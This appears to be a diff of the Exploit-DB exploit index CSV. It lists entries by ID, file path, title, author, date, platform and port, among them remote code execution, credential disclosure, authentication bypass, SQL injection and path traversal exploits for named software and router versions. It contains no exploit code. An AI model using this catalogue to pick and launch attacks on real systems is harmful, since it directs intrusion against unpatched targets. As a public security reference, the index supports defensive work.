@ -16693,6 +16699,7 @@ id,file,description,date,author,type,platform,port
45170,exploits/windows/remote/45170.py,"Mikrotik WinBox 6.42 - Credential Disclosure (Metasploit)",2018-08-09,"Omid Shojaei",remote,windows,
45193,exploits/windows/remote/45193.rb,"Oracle Weblogic Server - Deserialization Remote Code Execution (Metasploit)",2018-08-13,Metasploit,remote,windows,7001
45197,exploits/windows_x86-64/remote/45197.rb,"Cloudme 1.9 - Buffer Overflow (DEP) (Metasploit)",2018-08-14,"Raymond Wellnitz",remote,windows_x86-64,
45210,exploits/linux/remote/45210.py,"OpenSSH 2.3 < 7.4 - Username Enumeration (PoC)",2018-08-16,"Matthew Daley",remote,linux,
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -39764,6 +39771,7 @@ id,file,description,date,author,type,platform,port
45125,exploits/php/webapps/45125.txt,"Auditor Website 2.0.1 - Cross-Site Scripting",2018-08-02,"Vikas Chaudhary",webapps,php,80
45076,exploits/hardware/webapps/45076.py,"Davolink DVW 3200 Router - Password Disclosure",2018-07-23,"Ankit Anubhav",webapps,hardware,
45078,exploits/hardware/webapps/45078.py,"Tenda Wireless N150 Router 5.07.50 - Cross-Site Request Forgery (Reboot Router)",2018-07-23,"Nathu Nandwani",webapps,hardware,80
45209,exploits/hardware/webapps/45209.go,"Mikrotik WinBox 6.42 - Credential Disclosure (golang)",2018-08-17,"Maxim Yefimenko",webapps,hardware,
45084,exploits/hardware/webapps/45084.txt,"D-link DAP-1360 - Path Traversal / Cross-Site Scripting",2018-07-24,r3m0t3nu11,webapps,hardware,80
45088,exploits/hardware/webapps/45088.txt,"Trivum Multiroom Setup Tool 8.76 - Corss-Site Request Forgery (Admin Bypass)",2018-07-26,vulnc0d3,webapps,hardware,80
45090,exploits/linux/webapps/45090.txt,"Kirby CMS 2.5.12 - Cross-Site Request Forgery (Delete Page)",2018-07-26,"Zaran Shaikh",webapps,linux,
@ -39802,8 +39810,10 @@ id,file,description,date,author,type,platform,port
45190,exploits/multiple/webapps/45190.txt,"IBM Sterling B2B Integrator 5.2.0.1/5.2.6.3 - Cross-Site Scripting",2018-08-13,"Vikas Khanna",webapps,multiple,
45195,exploits/linux/webapps/45195.rb,"cgit 1.2.1 - Directory Traversal (Metasploit)",2018-08-14,"Dhiraj Mishra",webapps,linux,
45196,exploits/windows/webapps/45196.rb,"Oracle GlassFish Server Open Source Edition 4.1 - Path Traversal (Metasploit)",2018-08-14,Metasploit,webapps,windows,4848
45198,exploits/linux/webapps/45198.rb,"Oracle Glassfish OSE 4.1 - Path Traversal (Metasploit)",2018-08-14,"Dhiraj Mishra",webapps,linux,
45200,exploits/cgi/webapps/45200.txt,"ASUSTOR ADM 3.1.0.RFQ3 - Remote Command Execution / SQL Injection",2018-08-15,"Kyle Lovett",webapps,cgi,8001
45202,exploits/linux/webapps/45202.txt,"OpenEMR 5.0.1.3 - Arbitrary File Actions",2018-08-16,"Joshua Fam",webapps,linux,
45201,exploits/hardware/webapps/45201.txt,"ASUS-DSL N10 1.1.2.2_17 - Authentication Bypass",2018-08-15,AmnBAN,webapps,hardware,
45206,exploits/php/webapps/45206.txt,"Wordpress Plugin Export Users to CSV 1.1.1 - CSV Injection",2018-08-16,"Javier Olmedo",webapps,php,
45206,exploits/php/webapps/45206.txt,"WordPress Plugin Export Users to CSV 1.1.1 - CSV Injection",2018-08-16,"Javier Olmedo",webapps,php,
45208,exploits/php/webapps/45208.txt,"Pimcore 5.2.3 - SQL Injection / Cross-Site Scripting / Cross-Site Request Forgery",2018-08-16,"SEC Consult",webapps,php,80
45212,exploits/hardware/webapps/45212.py,"ADM 3.1.2RHG1 - Remote Code Execution",2018-08-17,"Matthew Fulton",webapps,hardware,443